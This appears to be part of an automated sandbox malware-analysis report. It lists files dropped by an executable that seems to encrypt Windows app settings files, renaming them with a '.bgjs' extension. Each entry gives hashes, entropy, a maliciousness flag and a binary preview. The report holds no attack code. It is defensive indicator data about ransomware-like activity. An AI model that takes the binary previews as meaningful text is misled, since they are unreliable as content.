                                                                                                                                      Preview:..].N&h....G...Q"w..N...{....&d..?...T....,..I.5.....R...}.kqB._.]?....m.p...*<...[s..-.1.?.Za-.Nnh.PS...H...V.P............O...zI8A....;.8...J.r.RE.....O...?/U...j....D:...RN..q...1..%...M....p])..-...E..0+.*....vo.w'.*.........."...u..."..s.w.....-.<..9....P..Ys2..&.....:..t6+.z..o.-M.........c.X..&.Gh.hEh_.-...tN..Bvy.K.l%..!(. ./.....n.5y.^........hB....5_.......t.....1.^.2*..K...M....LD}Y.B....y..|.3...i3Q.X\.Q..(...4.%...l.@6.UPF.........[..j.........n..CQW....m5."..5.9.i;......*....I....SQQ<G.*.......4u5.2kHC9..@t.y}v..5......k......~.5...".0....S.t=.%Wf.q.(8....eU:.. :?^..L....[.y....C...G.J..S.".G.".V.....J...y..Z.4.}.,..W0.Ek......K.c...h.k.l..F.k..3.0.r..(...4H..)..<..>./...-....Q.....).....)."...h{l.d..\..XL^.bW.....9..o..=..sS...Q...%.......-4A.O.";..e..i.......K..z.)...X.fH.....p.y7.]...L..I...I>1..Z<.%.;...4.....>@`o.!..h/p.S;[.%..V..z..D;.r...4..|.FzG........:...1iG[.J)....hz.y\..?.-..`.]\(%.@..4R.....%>.....G...A........`..

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.977474273796637
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:WE/jPd4nmy5KBt2lnXldg2ds+GTm6l4kezOpxQBOvrtfmWsXqcGobFILUFmSixLh:TJRBtoXXqvTGTAG0vNm/6crFhL3lZS
                                                                                                                                      MD5:7F28FCFAD998B0BDFBACB88FE844A768
                                                                                                                                      SHA1:E44BDCBC8B3C8DB181FF2C55CDDC4CC3E1AF0FDF
                                                                                                                                      SHA-256:30130A05AD13CC3C87C497B83092F050473A2C744EBB763BF04F35B20915A8C5
                                                                                                                                      SHA-512:1CAC2EA75CFFE5792FA5FBF3EC5A55FAA1250B9E1398672B9AA3584EB58D54EF8FD93FA5BB64F570DAB28EF099339B525F304CA79BA8B05BCD4BE215C386BA53
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.. ...+...|.[ .z....*.v.R..N.....jO.Y.=+.H+..1....}..w........'.LS.....1.Phe.v#N.......Y."W.U..)#`..?...._...l..,..S...p."..1....'.p.|...T.......K.M.v{f.....iA#..+.{......DSn.``}.zdd...O.A......". ..P.5.bEm..[.D....p.pA...M...N..#..mM....LJ'.QJ...O......G..Y .._^r"..Z.}..1Sz....J.D.....K. ..:.....0.5..q......<.(..fUR...Z..u..V.$. ...KV35..s.U..-.$.~..g..+.?..eHe...k{......On.....x.}m..{......J].C|.Gw..r.k.%.''.9TZ..wk._..v=@..8.*.*.#.w..../l?...wj..FB.A.Ye.u.{........<..T.c..*q...!.1......P*.G..P.GdFq.dW....s....aSr.j'.k.j....Wi.].L.>@P..L.T...`Oe.v&P."...<..>..d........@.vH......v.e}|.$....0......2..m^xm.....z.<-MP....(..(...7.2R...H.........\.{.>.2...{...]..6..5....../.,..'t..\(,.E..m...t...U..n..1..c.......c.x..|~....v.*...FC...$./.F$.`X].n...RU.,..a2........k(4.u.....0q......aju0.mP)C.d#..."{P.._*..qC...#.x,..h.....&?.k..FK.N."..,....+l.EA.kMln..".S...1..z.J_...$.n2..i.4g.......B..8..[..*.U5m.........+..IxbY...DC!..

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.9745878563196255
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:V8qsavLbkwSviH4dOgbX1lcyX+e//6ivnp:6kDA+goyOu6e
                                                                                                                                      MD5:F90916FB0A3E29D811039C844BA60C87
                                                                                                                                      SHA1:A7532A91A56CFEAB587E9851C868DCC0A054DEE4
                                                                                                                                      SHA-256:6B8646869B4EAE71F41E798DE46281D0296B263A2B08CC4376FE22D55A884361
                                                                                                                                      SHA-512:405F268D8C72ED35C02C249D4404132CEEF544C2CFF11F80FD657E84566D83CBCE8D32D12D078D7A18F665105D0DC09CED7D31EF919B72D0A2F060BCEDAC545C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.2...GKKR*He...`...4...TS.m{.`.).5...&J.P?..1ckdCJc.S~-..=..T.....?l3.6............:...{.R8..WA.q...d...H....#...X.>k..G.|.Gj..<%k....M.}.[ .Q..s........N.o..DidPj$W.....}m.j.v.I|......35..*.....A.(I.....Pi>.%HZ.>6..i.AC;....kTV......"...}]......P...y..6....R..x5F.1...K..R.{ZN{.Z..T.t..IN._..[...A......E'..."...&$5T(.p...KZ.z..........`bV.y...E^x.h...M'.Y.f.T._...?pRS/.j.n........X.)..d..T..f...g...p`.u./.oJ..2F.....(m.8s.Xx1..>f....U.>.K.z....l..~....;.8X.t.FN..2*K.a..H.o.Y>..Ey|W.c.h......zt.6.......z9kC...P6.9..Z&.[8G..+..$>...FWO;.}.0U.z..v..\..H.V..N..<{=...=.>.R.....L...m}F.E2...v..8.c,.-."..6......`vZ.q.R.X))X..#0/..S:...Z.....4...........-...%.>.SV2.a.\..j.`.5:....@'L.Q..831.1..0..T..em.D"{8...Q.U=.q...~..U.q...)...3x..6n...x<C..h.^..C..\.....Rp...+.x.X+....M....!6.v......o0..X..u>.....!s.!......m....8.W/)2........\D{?...}}.....Sg..?.A{..........G...j.1..C..M...r.|..u.i...Zq.m...?..H...o..Gn...'..I.VFP.....y'_..8.Rq...ur.

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.979073836750528
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:3ZVf6EMO9gEN5NtRU4fLPUsluCS7cCaX07R7TH/0wMRcndkez:JVrMeNN5nT8s6ZZgTRykO
                                                                                                                                      MD5:9ACD947610B63F0E0DA10A133EAD15D8
                                                                                                                                      SHA1:1008C7B98B5DD40B6D89465A54F90F50152FB9F8
                                                                                                                                      SHA-256:FC57CD4FF085E126CF59BF84A319B407EA03012CD0946ABE14E7CDE8EBDD8A52
                                                                                                                                      SHA-512:A2A4B1A86325950CE407AA21D199116FE774B57C63A0F6524336E3C1236752AE0532CB5C11132AD71624EE7CFE6B12958CC90B67870F92BCB96B695EA3D68251
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf..........S.a.....w7...Z.%"....K[>xm..F.]...E.].]gd..gk.s...z...QC.%.l...Sp.+OZ.^........C.$c.....u#U O......2....\.V...L.......)S...GH..j1.h..Q..U.f..;...*!.uY.?(C<1......j.....4...U.-..}..d.`.A..._p$......a.2..=..y..=u....NV.E...uf..D..?........1e*.l...f9.,F..s.H@....]!..d1.Q+..^.0..Pb?.k.\..1^..[[I.O...S5..Vu=S.../...o..Z>]CY.P...........m....._..B..`..I.DumGhE......w,I.3Y....m...{..........F.... ....V.U.RK~.$..O......kizt,.....d.,:#....^.Fa..o..Z.LE.u...K.@......{A.J-.>K.....y...[P....dW....1x.K..G......zH..,...g..b.)."..+.......`...Op....L....@......8.g"4..g?.......jv..<I)..G.@...........U...O._4..o.]/.,^.g.W.Q...J.7...=..s..`>$.?.7z.l.a>...BJ.@.e-_.....|.ng.....V.Y...,..h.QW..@N.,..W....{e.xF...2....;6...f..t.].......m.._.UR...2['.z'.T.i.u#..Y_.",i.X...v...tIm.....S.U\....^H\-..@-...tB.7rM.]C.o..6......E&....W\.J...?.?.L...fL...,..h"s..K.&*..F.V....p.......K`....$......N..Q..-#._.e...&.g.u/.._.......Y.\Ft..Z..Q.v...7-.g...G...B

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):33102
                                                                                                                                      Entropy (8bit):7.9951822614992345
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:trDMKspN+xhspPG60/1W12CybUuAudPXNspb:iKCN+xhspV7LCUsXNS
                                                                                                                                      MD5:BBF3507919276F2E9C10033DDDF9A78D
                                                                                                                                      SHA1:FEC81DB52A68EF34B3ACC6B9C6B2DEF27CA118F8
                                                                                                                                      SHA-256:F805B6CC78DDF57B76B452B8EFDDD78208D83843B4C2F8AA2CBE1C243B6474C2
                                                                                                                                      SHA-512:12CF434AE663AE045A26C4E24E788A299B6F0C781F5D3BA28C965C1BFA1B5916BB35EA38BE140BA14FBC25289CCFA21EA748BD84D7A43BCA24B402BE592089F7
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:regf...sC.3V.xn29e;)v{...A.x&.f.j..LM?........?...!..}..T~...L..'c.ukL\..4z.H9.h....~Q..r.M*!..y....k0&a...fz.o..Aph.~{...hk...4.^;...O.({....{......+.V..:0.Zm.../w..z..7....d.;.BA,.>.^...`z.9.*K...iG...lZ.....7/..Hg>..*-...R.SK.K%..Bg.<.R....+.....$.../............l.0.Uot})......|..O........._.......'.. [.}...{T.C.Y*.B".../$@!.#..7.).D.h..X:.]...3........._.-7%nG...I.....P...3$.i..6..w7.iu...P..THS...F......M..Jz...f.<H....5.Q2._.x....=...).Y.....Y..o....1O.?..Yk0.x-6.y.:;...L._.{R.P..x-..K.f...v.1......1..n..^.....SOgq_F....0i....M."..X...lL@Cb...'*`".Td..6.:....~8m,...#*A..&.7.X/)R.....Cl.3.n.kZ.S..;...U..F.:.;..A.s........2..i..+.@...(..oR.Xe.<.6.$qk..D`.4..k.I.....=.4j.s.#...................t.)....n-.D...J..G.g.Y...9F.Fi..+..iZB..@gn1`.G.$'.-..4...........0....k......S.....je3~.cGa.......Z..L.|[..]d...tV...n.5....g1.C..+]...DZF.....7Q...^.i.|.Q..g..M..].1r$T..b........c..$..`.]].g...$.|.S...._tlus2.wXa.A"I.wo...}.|..."E..PBw......r

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16718
                                                                                                                                      Entropy (8bit):7.988476323289624
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:ayzFEsukixS4Ri+4UNu0j55bizVXE1Jl+ukjpxO9RooL2:pzC5A48+NtdizV0vlKxmR7y
                                                                                                                                      MD5:78C3A4A7127B503249326B83AA6FCE76
                                                                                                                                      SHA1:DF2E33C7B28AFB6AACC52CA886C1FE1D891E32F0
                                                                                                                                      SHA-256:1CDA88AB76AEE80E7FC949F79A7C16FCF309CE1FE8A18C81F19F389A63E48780
                                                                                                                                      SHA-512:391FD9F6C918B0FC171911C47060614B70ECF7B51277A47CE4324B27AD79B3D6985AFD5D779EA3401709ED49149AE448DB1975CAD099E614D2C095BDF8020A4C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.Lj..%..'...!.b"1.r..l3...i.s...Rv:.7.0g'W....Z?......r..**.$,.....<.xv.9.|0$....t.....K."..{..$.a..0...<^..C....B.......|.].......YlVw....;=..H...m!.z..@.#g..x.D..#N...".j.!F...=.....-.G4..P..":<H.H....(R.H.5Kq.%......b/...5=.*( _7.z..}........@4 .....m....N.tq....;4.`.\z....M..^.3.S.'/.....R.^|..wy...'u.....z .......a...C..1.6N.rw...d.....k..NF-z1.\....,.~(C..Z/..y..../Z.9..E/_...~..Lk.2.0H...1%...;....O........k..[,J.!z..:.Rm/B..(....!..i.....^....J.\.k.....|>.~.....7.@.B...(?.Vk.).#...Q%.A...HE......D.|..n.\/.A8V7.M....M.f....Gi..J..{.Gv....!.....V...'./E.6y.h.dy~..".f.-.R..}.....E....S+.*.....9..-'.yG%.b!.,6xg.n.G2..L.R`.>.N[.....O;..b.u..6.[....p...LeI}.A......".3...1.Z.@]..f..O~...*.NK.....?F.z.......v..........4o...u..j..0..<q.q.c.9......5.P%.(%W. L.`...jV..^.Vg.[....../I..k........uw.W.;..4..., ,..9!].J.GN.[p..%<.I.9...tnh.z..a..'9iI.R...!.h.............WO.#..a{..eT...Y.W.h..0W.....F.N.....h.W.,.u.j$..g.Ti.(...f...7

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):45240
                                                                                                                                      Entropy (8bit):7.9953119194404225
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:foCge5Xqqiw2mXmsQMsBdOWr9SqU/tn9SKxrwJGswhcVbiYaPhfqHxBR3jaRY1:wPgRd2stOCtn229k7jp
                                                                                                                                      MD5:14CFF8F88D424EABE4D40E77BA927BAF
                                                                                                                                      SHA1:DB82F39EDFB29D164DA9849C501799E2F87B22A7
                                                                                                                                      SHA-256:EDBF42DC68E646386E30254747652D43E7E5381D68E8D89D5F616E4C88F9C06C
                                                                                                                                      SHA-512:981AF51CDA93DBCDDE1D120664E9EB50116255F6ED8016B4AE8A2C08B1F82EE91F6C9AE7A4CC935350B0C418CCA093E35A5958F30E3180375F757A2FB0DB6B2C
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:E..........3pbF.|.=&..)_.....*ZU.H.*;.a...b.#.....k..CX.=*.?..[...._...j....q...\e....~.I..`n.w,JZ.M...'h....se....E...g{:..?.......5'`......A.G{m..6.I(+p.&r4.Xi.....L....|.w.5.9[E...J...b..-kj...2..%...#)c..nSq\.7....$..lI.;.gn.DO.........o....t!..{.....|<.j.m/..w({..s...R.N9..W..W...NU..;......(.Vl ......o.......s...g9.$....\8{....N6~F_...E.)....?.....@.......I.j.3....c[.+... ....&.........8.h.. ..X.]...5[.jg.l..."g3.U..c.n........Q:../.A....6U.b.j.M.uB.w..=7......./D..@..q.\A.....m...}p...q^!.?,v.g.aIy....q..A..}HT...&..e..6.^Ah.....4....v....X.>.*....=.........zmS)..d.....%(.j....}>.%4...kw..@...J....=P..m..va.~..].m.%-%8.W...[q....V..'..C...!.Y..k..C...B..l.Z.O..'jz.8.*.u.......P....1..@.2..(....{K.4E7......D.Y.B.Z..?...`....%.u92..m8..L(.f1...4M.Z.i.........E..W.f.HF..p ..|...g........{U..LU~`..3...4...A..... ...L~.....7?..F.<..w....Wr.......t....L.v...S.6..e0.d........'b#C..}.`.U...s../.k..[...;+.. ..8.....l.Uag9h....d....r.6mk.......

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Windows.XGpuEjectDialog_cw5n1h2txyewy\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.978588927659176
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:RILySiMQPUw3dQ9SgCiiKgA1p/pu9jSZt0xzt1Q5D5:yOdMmR3dcSg0Mtpuxxts
                                                                                                                                      MD5:04BBF330AC5E433172EDF4D775C8AD19
                                                                                                                                      SHA1:AB3DFB691F5D89FD17C77A7DFB7DC398ECF401EB
                                                                                                                                      SHA-256:78F36A64449ED35C2D5096BD258BB887FFA50385F3E41912E9458FA8E97740C0
                                                                                                                                      SHA-512:ADE70E61E1F98EC3C24D247B36662D81DBA9075A0D65B9170986FE9556015FEF850E0E6E336B8651D5BB9AA94AF5E4142CCE2BB4FC834DDE8A5A657A1FA07640
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf....}S....<......w.........jOO....x..4....U,e.N...No..?.iz...5#.4K?8....i.r.U..R.b#Q...8.Q.....p.~.pV{.?.].`MA..9.l..%..?d......|8....8.....5.:N;...l|Q....<.n...1.dI0...Z.....R.eg?....P.r..5sR./.c4...2)e..OI..@@8......A...,...+.b...r.]..F..|..8.8.....9.Ti.,qkG5.3.0k..=4.i...8..P......e.1...A.v.n.....~.E...........v...k`;....Y.B }|.)...M1..... =.......4a\(..X...x7..A)B..-.%.4A-Y/E..7.......9....d.........z...;E..&.....w..1Y...u..>...+.-.E./.T.<5.i......_R..8.$.I.Cl..TU.\.f]^q.....6IR...U.C.Y.|[..@..........$......y.7..$}(.B.....]..5...u.....C.YQ.6..!.`vIvVc..&/....i..fH'%..............0..<.......&@..q!.yr~...ib.v....)...q..q.....=. ..[.q..)e^#.(...<I.#....u...;r.l.\..V....g.#....0..?)E......r.n/.)y..u$.....v.g.pv..B.B...".............3..4.s...z>.....&...&.nPH.}'...dQ...p..W.......x.:..Z.%U.6.}.Hz.-@..../\ ..0....A....."....o..}.L.m.....2..*x...P.'.6.f...>.:b%hd[.X.I......r..=X..b..%..=..j5.F;.. +............]S.....w~}......g...xo."..

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat.LOG1.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.97577772700589
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:GJuJaKrocJUFmnHiajZ/UnzxgwPJbzl/4/+s0CPPH2i4tdcNrqpR:GsYKoulnCC9ud1PJd4/bHWi4tqopR
                                                                                                                                      MD5:08738A00CA5248AD33855D2AA260D4BB
                                                                                                                                      SHA1:A0DF83F74FBEF43AFEF7A228DBA44F9547A43CA5
                                                                                                                                      SHA-256:22350A2ECA7809C91C6618713A553FB765A5848B2D1BCA5DDA5F2F3F7EC7D953
                                                                                                                                      SHA-512:15AFE5DA6CC16D0200F09BE0456C9103DEF8759CE74E0A459B6FA06328CA984ABD74CE2B23FE5F034D198D3760FCFB9141960AA5FF549192B37032962C1107A8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.......Cf."..pKT....._.w.}j.2..|..]6tU.`......$.#)b....E..].\.B.A9...Nk..s.A..W7f...Q .=H.gDUM.M2/.SRw0]. ....Y&..........voP......B..^x............./.....X....s.../..M?...y.~g....P.|.A..H.:....>....9....7>.....`=.B..zn..aA...@8q...."SW.Rd.K.\.D.H......1...i./.Iz.nm..8.='............C~.x.V`c.G..f..-.......T.djaeL.....n@.ZKy 2........9Eo(.(..sq`..-.v2....0.......V...m...~..L.^(Y.....;g1..eI...S..*..B#..L....-HW.h,rAT..<.J...3.=.5....`..T.'{_.##Cz...o{TWmB..,..c.,_mP..V...u.B[tv..t@B...._..w_w.E..=.>.i..}.3D.....[...b.#^X..`.]g..#..q....-X..P....v.O.?..>...<.)..............T m{.rq.'...?.i...J.A...7.G(/25.s6...`..gH.....E..}......J...U.\..B....:.f(../@V.(.8.....N.a..UW'.d..w.......5.'.F5......8.....|_...[S3......if.q?-......l8......@.y.....j._|...$..d..H..J.E..L..U.P...b..1funZ}{..7..t..k...E.d....._.|.}...gh..J.....+n..OM.......Zc..iB1..q.r....qfEU...[.._".k.,%..[..3}...N........dc 'z.............h.f^"]-.Fge..b... $1.s.f........./..P.t.U>

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.9788703264918945
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Iai5H/qbpCmK9P0TtE1GAabW/sD0WjGRQQuqDdd+akq:My7gXRpsoWjGmQu2dZkq
                                                                                                                                      MD5:55B7DC151D7A7AAED567DB07A50CC201
                                                                                                                                      SHA1:C6A1AD5F47EE993098302275C576B9BA23EDFEE4
                                                                                                                                      SHA-256:E633FC81A748E5AB3D81A303F7DFE19D7CEE899FE41BB48F5C0DB20F49B85C20
                                                                                                                                      SHA-512:04C452119947675C95D914019BF2F97A5A4CD4BAD81E6630C225CB70506C286E4D8CDD524BDFB86552906125F7C7E956FC531FD32444E8AD8DD36D7FE0224A8C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.......S.D.....<....1Vk....H.e...p..z..|..\P....w..v.t.$.. >......c......ti..0H.}..Z>.............i.:7.P...yrMx...CGK}.G..4bD...q..W..C p.5s..7 .F..'..C..tuG..s.....w`.c..X....ap...........wjb?..!.3...dr2.3h.N....8..j....l.l.K..J..._.....'.>U.oI.V;..D.*...@u~.[...!J...6]...0..[G...T]g....m...jMoH)BB....a@.B...&..EX..nK..S....*.|N......S......}..4..F....a.....f..Z.L......RC.8....../..0......h=......R3.)K.._..[..+r.g...YO.V4. ,L...$..S.@..."...7..)B..d..p9.w.W[.4.6......{cIU.r.W. .....".dZ./.'.UL&I.^.<...}y])[...;zv...ff..0.8...$..wk:?.x7....~v(.).0..d........iL....*Yn|....m.....^J.....o:y.....M..:../4.....z^...!..7.....2J.....R{..........l...s.@.O@ .G.PP..v.".J..MD|q`.G..4....P.;.@.....3Qk......+~.i......;z.Jf...z....B.Z..k..B.:j..XaW.....s8\....}..Wi.$[.*.S.@1B.q`.[.[..E.....).C..".....I../.1.....X.1.......Tf...Q]....Vo.!KW;.....x.s....e6.......J./..;.).S...-....lF...8.8.L. 4....yBR...)#L.l...&.........4c..J....0...>.)..9.......

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.9821319769258405
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:NJSJHDpaM+5lgCpybgwyyhIfteK3Bymebdswmc842vqAkt/nK:CJHDkM+3bobgghspbyswI42fkFK
                                                                                                                                      MD5:6D1BCFE7F1F321538ACF76FB05AFC039
                                                                                                                                      SHA1:12286D66934D63D0801C62F248225FC801E95160
                                                                                                                                      SHA-256:6A7ACA10F43224D37F360DB1C023DDF1A6022FA667CC36B72F6332A0F30BA4B0
                                                                                                                                      SHA-512:4A74AF87C119DDC2082A5B246DA99038ACA17A9AEA686F11D0E38369792B6E5A0B2BD15CEE778B41BB83768672AF0CD87EA3162719877433203DD66B1E8221D3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.%.t:..L.b...........).r.......>.fj...z.......\.I.......N..|T..l.z.9..^.8...o...1.Y.{s.....K..;.Mc...wR... .b....MF.K.|...Q..|Z< .5.Y-....il....7.]S..i..8.....|!oY.(._.lv..1.rO..|..).4.0JL.2..?...F..N...%....[V..FF.(..;Q.......sU._.E$...&....d.38..E"...........^O...0.S......<..W. .....W.9.~Q(.g`_L.c.P...'..h..0^;Ls.M..I_.f...k.V..`...1.........O........Ia.*..Qt.j.K..2.G.ea..+..dv..i.-.b..j9c.1u.@}.......d.hs. ....%.}.....]....'..x.S.3tZ.`G..C...9I.Y.S....].%..tS.4...5..........Hn.c.-&.5izwmx.F....`.......6.4......Uu..U.,k.K./P........V.a5...<).O.q|#A..D[..........34z.H..{|....PF2.F..gizC7..A.........-\.$t.....c..xv9."....p.....b.....~..{b..\..(..B,....uY....+...Cb...-D..TE...e....P...Z1............=.........jKe...b.:h...7}((9Os..K.........beY..&>#k.x#....=.7.&.........^...bTP........z..........Rz.!.g.......K.s.{L..\......Rcy.:.8s...>...C*..7.l.....{T..7C....&s....C.S....?."....@.7d..nm'.hB....&(w..G.BwM*!.$...IUUe...G....Q....u.[

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.980200093361607
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:i3AwStKGdbuI/k+crUah1AZ01hrkLP4l5ezvBKK95gZ:jDtG7UC1AZKh4sHKAZ
                                                                                                                                      MD5:60D0B73EBE38E1C2D11FC0BAAA90B471
                                                                                                                                      SHA1:877878D971F0C5ED30228671E30B2ABD8E06C09A
                                                                                                                                      SHA-256:694E5A08BE1E473A4C8C9376CF6ED4A470BC1620390211E41546BB17768C4DB3
                                                                                                                                      SHA-512:1A6D364EA51887D42530B0FB235A7E7583773CE9E268768C580C82545E157B57E56B9801FAD4D23D5298BA0B4646A344C57A91908DED3BF0EECA7E6BE34D45C3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.m.h..aU.H.uT....q*.q....w.*.eN..R...Oh...f......s...x...8....m...>.s~..0....2u.{@.c.a..9b]Y..I..g.[.GW._.y..}......ubk.9.[h.y.8...|.G..Yu...1Bc..........y..f..........o.7W.c..2B..L*..9...N*..._1q`..iu?..i..1.bZ.F..K5..o..C..IQ.`.#2X)...k..".....8..rv.4.vo..<..g5..m2X.c7H.|%.8..........wo..t.m]..P......=D....|.dR}...Za.C}.4...oo.5....,fw.mr.*.(...L......T-.de...Jk.4.|5..=:|.sN...B...di..'r..v[C;.X.L.V(..... ...T..#.\...l3....q..../....c#.... ....Z..i...Q.D(.|.......J...u.?....%.#.4.&N..plWDNb...n..uf..#.{.P_3CJb..%A.'2L.z.A<}.;.T[>.R}...........O.....9..F.J.f.Cc./%(.ULK. ....+..&..G..%..[..P...2.t.B~+z.....Em....F..X......&.t....p[8C.<.L.xg..I'!;..*-.uv..8Sha=..P.<<eG;....].W.H..A.T./*..@...!8ni.FMm......g.u....pb...ipd...F#..R...X.....B.L.,.......F.7"...4.T....U...3..[t.6..$........h.:.?'....*.F.T.........W..`........S...|;..sfQy.M.=Xj...;.f..[......o/Y.x......}.y....... .6..J...@_N.D.K...7^L.`.I.`.5mU.m.N.$mI..B...........-...

                                                                                                                                      C:\Users\user\Local Settings\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.978874340617128
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:zVKynj4ziV3+65zQdvqd8psUCHPDp7uP0/LCrFecLmNeQ2BUESuixqZx:zIynj4qqRaU+rp00/LUFevMQdufr
                                                                                                                                      MD5:8EF21D0B3373241F1DACD14AFA331DA2
                                                                                                                                      SHA1:94482B210F9A7BF5027C55E209D8FDB933F731C5
                                                                                                                                      SHA-256:9CBE4461D2A04CD25AF95C46A40A32BAF268DA20199DB95EAFFC694533FD9654
                                                                                                                                      SHA-512:7DFD0923F3D7A0067F0D976EDC99B235ADC7BD6B649B4AF6D7998808C0D5DE7F926CF08D38B6439B2E7AD321356870A1FDCC75098F28952496AFF9136E66DDAC
                                                                                                                                      Malicious:false
